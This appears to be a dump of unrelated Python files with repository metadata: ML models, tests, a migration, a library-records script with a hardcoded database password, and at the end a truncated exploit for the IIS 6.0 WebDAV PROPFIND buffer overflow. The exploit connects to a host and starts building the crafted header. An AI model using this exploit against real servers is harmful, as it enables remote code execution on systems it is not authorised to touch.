2021-04-13T21:30:58.000Z
|
shapreg/__init__.py
|
iancovert/shapley-regression
|
ea7d149d92408c8b219fc7b37ff2e71fc22050dc
|
[
"MIT"
] | 6
|
2021-04-11T10:13:11.000Z
|
2021-12-28T22:28:52.000Z
|
from . import removal
from . import games
from . import stochastic_games
from . import shapley
from . import shapley_unbiased
from . import shapley_sampling
from . import plotting
from . import utils
| 22.222222
| 30
| 0.8
| 27
| 200
| 5.814815
| 0.37037
| 0.509554
| 0.324841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 200
| 8
| 31
| 25
| 0.934524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5ef7a93ff79f6765d91999e49718cee7d30edaf4
| 63
|
py
|
Python
|
toyotama/pwn/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | null | null | null |
toyotama/pwn/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | null | null | null |
toyotama/pwn/__init__.py
|
Laika/Toyotama
|
0eee74f8cd5a8f7d5bcdc5aeab1d74e5af5607de
|
[
"MIT"
] | 1
|
2021-07-10T03:52:35.000Z
|
2021-07-10T03:52:35.000Z
|
from toyotama.pwn.fsa import *
from toyotama.pwn.util import *
| 21
| 31
| 0.777778
| 10
| 63
| 4.9
| 0.6
| 0.489796
| 0.612245
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 63
| 2
| 32
| 31.5
| 0.890909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6f2f4d1a4b2b91f2edd545a3befebd766cb122c2
| 2,059
|
py
|
Python
|
BookReturnRecords1.py
|
XQuickmathsX/library-management-oncemore
|
e4e1650ebf40c63f9ed0aa0893cec010aebb0e76
|
[
"MIT"
] | null | null | null |
BookReturnRecords1.py
|
XQuickmathsX/library-management-oncemore
|
e4e1650ebf40c63f9ed0aa0893cec010aebb0e76
|
[
"MIT"
] | null | null | null |
BookReturnRecords1.py
|
XQuickmathsX/library-management-oncemore
|
e4e1650ebf40c63f9ed0aa0893cec010aebb0e76
|
[
"MIT"
] | null | null | null |
import mysql.connector
mydb= mysql.connector(host="127.0.0.1", user="root", passwd="2zkNKcz&EOZaRjc$",database="library_management_project")
def returneestudentadd():
Borrowers_IDp=int(input("ENTER YOUR BORROWERS_ID:- "))
#todo query to add this expression into the database
bookIDp=int(input("ENTER YOUR BOOK'S ID:- "))
#todo query to add this expression into the database
bktitlep=input("ENTER YOUR BOOK'S TITLE/NAME:- ")
#todo query to add this expression into the database
studIDp=input("ENTER YOUR STUDENT_ID:- ")
#todo query to add this expression into the database
stfnamep=input("ENTER YOUR FIRST NAME:- ")
#todo query to add this expression into the database
releaseDatep=int(input("ENTER RELEASE DATE(MMDDYYYY):- "))
#todo query to add this expression into the database
duedatep=int(input("ENTER YOUR DUE DATE(MMDDYYYY):- "))
#todo query to add this expression into the database
bkdatereturnp=int(input("ENTER THE BOOK RETURN DATE(MMDDYYYY)"))
#todo query to add this expression into the database
def returneestaffadd():
Borrowers_IDp=int(input("ENTER YOUR BORROWERS_ID:- "))
#todo query to update this expression into the database
bookIDp=int(input("ENTER YOUR BOOK'S ID:- "))
#todo query to update this expression into the database
bktitlep=input("ENTER YOUR BOOK'S TITLE/NAME:- ")
#todo query to update this expression into the database
staffIDp=input("ENTER YOUR STUDENT_ID:- ")
#todo query to update this expression into the database
stffnamep=input("ENTER YOUR FIRST NAME:- ")
#todo query to update this expression into the database
releaseDatep=int(input("ENTER RELEASE DATE(MMDDYYYY):- "))
#todo query to update this expression into the database
duedatep=int(input("ENTER YOUR DUE DATE(MMDDYYYY):- "))
#todo query to update this expression into the database
bkdatereturnp=int(input("ENTER THE BOOK RETURN DATE(MMDDYYYY)"))
#todo query to update this expression into the database
| 57.194444
| 118
| 0.716853
| 288
| 2,059
| 5.097222
| 0.194444
| 0.108992
| 0.119891
| 0.228883
| 0.877384
| 0.877384
| 0.877384
| 0.877384
| 0.822888
| 0.822888
| 0
| 0.004194
| 0.189412
| 2,059
| 36
| 119
| 57.194444
| 0.875374
| 0.407965
| 0
| 0.6
| 0
| 0
| 0.435415
| 0.022241
| 0
| 0
| 0
| 0.027778
| 0
| 1
| 0.1
| false
| 0.05
| 0.05
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f52ff6b2dc7006d52ca2f1707dd4d5fd9355637
| 1,375
|
py
|
Python
|
draw_video.py
|
lidongyv/Reppoint-Tracking
|
81b81e921f6b905e68aba117ffc4fca8ffcfcfd6
|
[
"MIT"
] | null | null | null |
draw_video.py
|
lidongyv/Reppoint-Tracking
|
81b81e921f6b905e68aba117ffc4fca8ffcfcfd6
|
[
"MIT"
] | null | null | null |
draw_video.py
|
lidongyv/Reppoint-Tracking
|
81b81e921f6b905e68aba117ffc4fca8ffcfcfd6
|
[
"MIT"
] | null | null | null |
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import os
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
import ffmpeg
path='/home/ld/RepPoints/debug/feature_change/1'
# (
# ffmpeg
# .input(os.path.join(path,'resnet/*.jpg'), pattern_type='glob', framerate=10)
# .output(os.path.join(path,'resnet.mp4'))
# .run()
# )
# (
# ffmpeg
# .input(os.path.join(path,'stsn_r/*.jpg'), pattern_type='glob', framerate=10)
# .output(os.path.join(path,'stsn_r.mp4'))
# .run()
# )
# (
# ffmpeg
# .input(os.path.join(path,'stsn_s/*.jpg'), pattern_type='glob', framerate=10)
# .output(os.path.join(path,'stsn_s.mp4'))
# .run()
# )
# (
# ffmpeg
# .input(os.path.join(path,'init_rep/*.jpg'), pattern_type='glob', framerate=10)
# .output(os.path.join(path,'init_rep.mp4'))
# .run()
# )
# (
# ffmpeg
# .input(os.path.join(path,'refine_rep/*.jpg'), pattern_type='glob', framerate=10)
# .output(os.path.join(path,'refine_rep.mp4'))
# .run()
# )
(
ffmpeg
.input(os.path.join(path,'agg_f/*.jpg'), pattern_type='glob', framerate=10)
.output(os.path.join(path,'agg_f.mp4'))
.run()
)
(
ffmpeg
.input(os.path.join(path,'support_f/*.jpg'), pattern_type='glob', framerate=10)
.output(os.path.join(path,'support_f.mp4'))
.run()
)
| 25.462963
| 86
| 0.626182
| 197
| 1,375
| 4.263959
| 0.218274
| 0.1
| 0.166667
| 0.233333
| 0.878571
| 0.864286
| 0.779762
| 0.779762
| 0.705952
| 0.541667
| 0
| 0.020906
| 0.165091
| 1,375
| 53
| 87
| 25.943396
| 0.710801
| 0.560727
| 0
| 0.380952
| 0
| 0
| 0.169284
| 0.071553
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.380952
| 0
| 0.380952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6f77d134e788eb011a09e7bf579c6eda6ffabfb9
| 129
|
py
|
Python
|
malesmo/gboost/__init__.py
|
loven-doo/MaLeSMo
|
555ce22c2ef6dfe78af6717b502d9274a4faa743
|
[
"BSD-3-Clause"
] | null | null | null |
malesmo/gboost/__init__.py
|
loven-doo/MaLeSMo
|
555ce22c2ef6dfe78af6717b502d9274a4faa743
|
[
"BSD-3-Clause"
] | null | null | null |
malesmo/gboost/__init__.py
|
loven-doo/MaLeSMo
|
555ce22c2ef6dfe78af6717b502d9274a4faa743
|
[
"BSD-3-Clause"
] | null | null | null |
from malesmo.gboost.model_catb import ModelCatBoost, CatBoostParams
from malesmo.gboost.model_xgb import ModelXGB, XGBoostParams
| 43
| 67
| 0.875969
| 16
| 129
| 6.9375
| 0.6875
| 0.198198
| 0.306306
| 0.396396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077519
| 129
| 2
| 68
| 64.5
| 0.932773
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
48c2c3b75988ca92a23b7d93b799018e2471db42
| 7,444
|
py
|
Python
|
migrations/versions/d709caf1aef0_.py
|
CatsAreEvil/box-office-studio
|
0fcf19ccd4f65622d94c6cf0c6ac2ef4fd1bd5f8
|
[
"MIT"
] | null | null | null |
migrations/versions/d709caf1aef0_.py
|
CatsAreEvil/box-office-studio
|
0fcf19ccd4f65622d94c6cf0c6ac2ef4fd1bd5f8
|
[
"MIT"
] | 1
|
2019-06-12T01:25:39.000Z
|
2019-06-12T01:25:40.000Z
|
migrations/versions/d709caf1aef0_.py
|
CatsAreEvil/box-office-studio
|
0fcf19ccd4f65622d94c6cf0c6ac2ef4fd1bd5f8
|
[
"MIT"
] | null | null | null |
"""empty message
Revision ID: d709caf1aef0
Revises: 0682670d8b62
Create Date: 2019-05-25 19:21:03.965915
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = 'd709caf1aef0'
down_revision = '0682670d8b62'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('results', sa.Column('movie', sa.String(), nullable=True))
op.add_column('results', sa.Column('movie_gross', sa.Float(), nullable=True))
op.drop_column('results', 'movie_10_results')
op.drop_column('results', 'movie_2_results')
op.drop_column('results', 'movie_15_results')
op.drop_column('results', 'movie_17_results')
op.drop_column('results', 'movie_11')
op.drop_column('results', 'movie_12_results')
op.drop_column('results', 'movie_1_results')
op.drop_column('results', 'movie_7_results')
op.drop_column('results', 'movie_18')
op.drop_column('results', 'movie_12')
op.drop_column('results', 'movie_14_results')
op.drop_column('results', 'movie_4')
op.drop_column('results', 'movie_5_results')
op.drop_column('results', 'movie_4_results')
op.drop_column('results', 'movie_3')
op.drop_column('results', 'movie_11_results')
op.drop_column('results', 'movie_17')
op.drop_column('results', 'movie_6')
op.drop_column('results', 'movie_6_results')
op.drop_column('results', 'movie_10')
op.drop_column('results', 'movie_20')
op.drop_column('results', 'movie_16')
op.drop_column('results', 'movie_19')
op.drop_column('results', 'movie_8_results')
op.drop_column('results', 'movie_13')
op.drop_column('results', 'movie_19_results')
op.drop_column('results', 'movie_7')
op.drop_column('results', 'movie_16_results')
op.drop_column('results', 'movie_1')
op.drop_column('results', 'movie_20_results')
op.drop_column('results', 'movie_2')
op.drop_column('results', 'movie_3_results')
op.drop_column('results', 'movie_14')
op.drop_column('results', 'movie_15')
op.drop_column('results', 'movie_13_results')
op.drop_column('results', 'movie_9')
op.drop_column('results', 'movie_18_results')
op.drop_column('results', 'movie_5')
op.drop_column('results', 'movie_9_results')
op.drop_column('results', 'movie_8')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('results', sa.Column('movie_8', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_9_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_5', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_18_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_9', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_13_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_15', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_14', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_3_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_2', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_20_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_1', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_16_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_7', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_19_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_13', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_8_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_19', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_16', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_20', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_10', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_6_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_6', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_17', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_11_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_3', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_4_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_5_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_4', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_14_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_12', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_18', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_7_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_1_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_12_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_11', sa.VARCHAR(), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_17_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_15_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_2_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('results', sa.Column('movie_10_results', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.drop_column('results', 'movie_gross')
op.drop_column('results', 'movie')
# ### end Alembic commands ###
| 67.063063
| 138
| 0.738716
| 1,003
| 7,444
| 5.254237
| 0.077767
| 0.207211
| 0.087666
| 0.143454
| 0.933966
| 0.929412
| 0.774573
| 0.702467
| 0.702087
| 0.693928
| 0
| 0.031878
| 0.0982
| 7,444
| 110
| 139
| 67.672727
| 0.753166
| 0.039629
| 0
| 0
| 0
| 0
| 0.220472
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021505
| false
| 0
| 0.032258
| 0
| 0.053763
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48f8b600685f4396a53a8c75ec94c48c550d5661
| 2,942
|
py
|
Python
|
Model/models.py
|
tarun360/SpeakerProfiling
|
61a033aed07e89d94e18d89393e11b43862933ab
|
[
"MIT"
] | 6
|
2022-01-10T11:30:52.000Z
|
2022-01-11T05:29:25.000Z
|
Model/models.py
|
tarun360/SpeakerProfiling
|
61a033aed07e89d94e18d89393e11b43862933ab
|
[
"MIT"
] | null | null | null |
Model/models.py
|
tarun360/SpeakerProfiling
|
61a033aed07e89d94e18d89393e11b43862933ab
|
[
"MIT"
] | 2
|
2022-01-13T05:20:07.000Z
|
2022-03-23T12:05:41.000Z
|
import torch
import torch.nn as nn
from conformer.encoder import ConformerEncoder
from IPython import embed
class UpstreamTransformer(nn.Module):
def __init__(self, upstream_model='wav2vec2',num_layers=6, feature_dim=768, unfreeze_last_conv_layers=False):
super().__init__()
self.upstream = torch.hub.load('s3prl/s3prl', upstream_model)
# Selecting the 9th encoder layer (out of 12)
self.upstream.model.encoder.layers = self.upstream.model.encoder.layers[0:9]
for param in self.upstream.parameters():
param.requires_grad = False
if unfreeze_last_conv_layers:
for param in self.upstream.model.feature_extractor.conv_layers[5:].parameters():
param.requires_grad = True
encoder_layer = torch.nn.TransformerEncoderLayer(d_model=feature_dim, nhead=8, batch_first=True)
self.transformer_encoder = torch.nn.TransformerEncoder(encoder_layer, num_layers=num_layers)
self.height_regressor = nn.Linear(feature_dim, 1)
self.age_regressor = nn.Linear(feature_dim, 1)
self.gender_classifier = nn.Sequential(
nn.Linear(feature_dim, 1),
nn.Sigmoid()
)
def forward(self, x):
x = [wav for wav in x.squeeze(1)]
x = self.upstream(x)['last_hidden_state']
output = self.transformer_encoder(x)
output_averaged = torch.mean(output, dim=1)
height = self.height_regressor(output_averaged)
age = self.age_regressor(output_averaged)
gender = self.gender_classifier(output_averaged)
return height, age, gender
# height only models
class UpstreamTransformerH(nn.Module):
def __init__(self, upstream_model='wav2vec2',num_layers=6, feature_dim=768, unfreeze_last_conv_layers=False):
super().__init__()
self.upstream = torch.hub.load('s3prl/s3prl', upstream_model)
# Selecting the 9th encoder layer (out of 12)
self.upstream.model.encoder.layers = self.upstream.model.encoder.layers[0:9]
for param in self.upstream.parameters():
param.requires_grad = False
if unfreeze_last_conv_layers:
for param in self.upstream.model.feature_extractor.conv_layers[5:].parameters():
param.requires_grad = True
encoder_layer = torch.nn.TransformerEncoderLayer(d_model=feature_dim, nhead=8, batch_first=True)
self.transformer_encoder = torch.nn.TransformerEncoder(encoder_layer, num_layers=num_layers)
self.height_regressor = nn.Linear(feature_dim, 1)
def forward(self, x):
x = [wav for wav in x.squeeze(1)]
x = self.upstream(x)['last_hidden_state']
output = self.transformer_encoder(x)
output_averaged = torch.mean(output, dim=1)
height = self.height_regressor(output_averaged)
return height
| 42.028571
| 113
| 0.669613
| 365
| 2,942
| 5.167123
| 0.224658
| 0.089077
| 0.07211
| 0.04666
| 0.839343
| 0.829268
| 0.829268
| 0.81018
| 0.81018
| 0.81018
| 0
| 0.016889
| 0.235214
| 2,942
| 70
| 114
| 42.028571
| 0.821333
| 0.03603
| 0
| 0.705882
| 0
| 0
| 0.025415
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078431
| false
| 0
| 0.078431
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2c21253c36a48f6ec8d55065fc36321359f0722
| 4,931
|
py
|
Python
|
tests/test_train_e2e.py
|
brentyi/torchfilter
|
da0250baf2197f59b6e67f37cafdd63015380cbb
|
[
"MIT"
] | 84
|
2020-09-08T07:33:04.000Z
|
2022-03-30T17:25:00.000Z
|
tests/test_train_e2e.py
|
brentyi/diffbayes
|
da0250baf2197f59b6e67f37cafdd63015380cbb
|
[
"MIT"
] | 4
|
2020-11-03T14:32:11.000Z
|
2021-05-12T02:49:49.000Z
|
tests/test_train_e2e.py
|
brentyi/diffbayes
|
da0250baf2197f59b6e67f37cafdd63015380cbb
|
[
"MIT"
] | 18
|
2020-11-04T22:20:55.000Z
|
2021-12-21T10:23:26.000Z
|
import torch
from _linear_system_fixtures import (
buddy,
generated_data,
generated_data_numpy_list,
single_step_dataloader,
subsequence_dataloader,
)
from _linear_system_models import (
LinearDynamicsModel,
LinearKalmanFilterMeasurementModel,
LinearParticleFilterMeasurementModel,
LinearVirtualSensorModel,
get_trainable_model_error,
state_dim,
)
import torchfilter
def test_train_ekf_e2e(subsequence_dataloader, buddy):
"""Check that training our EKF end-to-end drops both dynamics and measurement
errors.
"""
# Create individual models + filter
dynamics_model = LinearDynamicsModel(trainable=True)
measurement_model = LinearKalmanFilterMeasurementModel(trainable=True)
filter_model = torchfilter.filters.ExtendedKalmanFilter(
dynamics_model=dynamics_model, measurement_model=measurement_model
)
# Compute initial errors
initial_dynamics_error = get_trainable_model_error(dynamics_model)
initial_measurement_error = get_trainable_model_error(measurement_model)
# Train for 1 epoch
buddy.attach_model(filter_model)
torchfilter.train.train_filter(
buddy,
filter_model,
subsequence_dataloader,
initial_covariance=torch.eye(state_dim) * 0.01,
)
# Check that errors dropped
assert get_trainable_model_error(dynamics_model) < initial_dynamics_error
assert get_trainable_model_error(measurement_model) < initial_measurement_error
def test_train_ukf_e2e(subsequence_dataloader, buddy):
"""Check that training our UKF end-to-end drops both dynamics and measurement
errors.
"""
# Create individual models + filter
dynamics_model = LinearDynamicsModel(trainable=True)
measurement_model = LinearKalmanFilterMeasurementModel(trainable=True)
filter_model = torchfilter.filters.UnscentedKalmanFilter(
dynamics_model=dynamics_model, measurement_model=measurement_model
)
# Compute initial errors
initial_dynamics_error = get_trainable_model_error(dynamics_model)
initial_measurement_error = get_trainable_model_error(measurement_model)
# Train for 1 epoch
buddy.attach_model(filter_model)
torchfilter.train.train_filter(
buddy,
filter_model,
subsequence_dataloader,
initial_covariance=torch.eye(state_dim) * 0.01,
)
# Check that errors dropped
assert get_trainable_model_error(dynamics_model) < initial_dynamics_error
assert get_trainable_model_error(measurement_model) < initial_measurement_error
def test_train_virtual_sensor_ekf_e2e(subsequence_dataloader, buddy):
"""Check that training our virtual sensor EKF end-to-end drops both dynamics and
virtual sensor errors.
"""
# Create individual models + filter
dynamics_model = LinearDynamicsModel(trainable=True)
virtual_sensor_model = LinearVirtualSensorModel(trainable=True)
filter_model = torchfilter.filters.VirtualSensorExtendedKalmanFilter(
dynamics_model=dynamics_model, virtual_sensor_model=virtual_sensor_model
)
# Compute initial errors
initial_dynamics_error = get_trainable_model_error(dynamics_model)
initial_virtual_sensor_error = get_trainable_model_error(virtual_sensor_model)
# Train for 1 epoch
buddy.attach_model(filter_model)
torchfilter.train.train_filter(
buddy,
filter_model,
subsequence_dataloader,
initial_covariance=torch.eye(state_dim) * 0.01,
)
# Check that errors dropped
assert get_trainable_model_error(dynamics_model) < initial_dynamics_error
assert (
get_trainable_model_error(virtual_sensor_model) < initial_virtual_sensor_error
)
def test_train_pf_e2e(subsequence_dataloader, buddy):
"""Check that training our particle filter end-to-end drops both dynamics and
measurement errors.
"""
# Create individual models + filter
dynamics_model = LinearDynamicsModel(trainable=True)
measurement_model = LinearParticleFilterMeasurementModel(trainable=True)
filter_model = torchfilter.filters.ParticleFilter(
dynamics_model=dynamics_model,
measurement_model=measurement_model,
num_particles=500,
)
# Compute initial errors
initial_dynamics_error = get_trainable_model_error(dynamics_model)
initial_measurement_error = get_trainable_model_error(
measurement_model.kalman_filter_measurement_model
)
# Train for 1 epoch
buddy.attach_model(filter_model)
torchfilter.train.train_filter(
buddy,
filter_model,
subsequence_dataloader,
initial_covariance=torch.eye(state_dim) * 0.01,
)
# Check that errors dropped
assert get_trainable_model_error(dynamics_model) < initial_dynamics_error
assert (
get_trainable_model_error(measurement_model.kalman_filter_measurement_model)
< initial_measurement_error
)
| 34.243056
| 86
| 0.762928
| 540
| 4,931
| 6.594444
| 0.137037
| 0.073013
| 0.081157
| 0.105027
| 0.822241
| 0.803707
| 0.780118
| 0.765234
| 0.711879
| 0.682673
| 0
| 0.005696
| 0.181099
| 4,931
| 143
| 87
| 34.482517
| 0.876176
| 0.155344
| 0
| 0.510638
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 1
| 0.042553
| false
| 0
| 0.042553
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2e779472ad1bba64a215c1a19201cb748bd25c9
| 6,149
|
py
|
Python
|
assets/img/grandpa-hackthebox/exploit.py
|
pulkittalwar2611/pulkittalwar.github.io
|
a057e3cb866d3b3a8a5c31f83524ee37d249fc2c
|
[
"MIT"
] | null | null | null |
assets/img/grandpa-hackthebox/exploit.py
|
pulkittalwar2611/pulkittalwar.github.io
|
a057e3cb866d3b3a8a5c31f83524ee37d249fc2c
|
[
"MIT"
] | null | null | null |
assets/img/grandpa-hackthebox/exploit.py
|
pulkittalwar2611/pulkittalwar.github.io
|
a057e3cb866d3b3a8a5c31f83524ee37d249fc2c
|
[
"MIT"
] | null | null | null |
'''
Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Additional Information: the ScStoragePathFromUrl function is called twice
Vulnerability Type: Buffer overflow
Vendor of Product: Microsoft
Affected Product Code Base: Windows Server 2003 R2
Affected Component: ScStoragePathFromUrl
Attack Type: Remote
Impact Code execution: true
Attack Vectors: crafted PROPFIND data
Has vendor confirmed or acknowledged the vulnerability?:true
Discoverer:Zhiniang Peng and Chen Wu.
Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
'''
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('10.10.10.14',80))
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If: <http://localhost/aaaaaaa'
